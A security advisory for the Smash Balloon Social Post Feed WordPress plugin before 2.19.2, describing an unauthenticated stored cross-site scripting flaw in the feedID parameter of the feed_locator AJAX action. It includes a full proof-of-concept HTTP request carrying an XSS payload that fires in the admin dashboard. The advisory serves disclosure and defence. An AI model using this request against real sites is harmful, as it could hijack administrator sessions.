Smash Balloon Social Post Feed < 2.19.2 - Unauthenticated Stored XSS
Description
The plugin does not sanitise or escape the feedID POST parameter in its feed_locator AJAX action (available to both authenticated and unauthenticated users) before outputting a truncated version of it in the admin dashboard, leading to an unauthenticated Stored Cross-Site Scripting issue which will be executed in the context of a logged in administrator.
Proof of Concept
For the attack to be successful, the following requirements need to be meet - Max payload size: 31 characters - feedID parameter length must be greater than 31 characters to trigger the echo of unescaped data - The shortCodeAtts parameter value must be uniq POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 192 Connection: close action=feed_locator&feedLocatorData[0][feedID]=<img%20src%20onerror=alert(/XSS/)> &feedLocatorData[0][shortCodeAtts]=uniq1234&feedLocatorData[0][postID]=1&feedLocatorData[0][location]=footer XSS will be triggered at https://example.com/wp-admin/admin.php?page=cff-top&tab=allfeeds
Affects Plugins
Fixed in version 2.19.2✓
References
Classification
Miscellaneous
Timeline
Publicly Published
2021-08-16 (about 3 months ago)
Added
2021-08-16 (about 3 months ago)
Last Updated
2021-08-16 (about 3 months ago)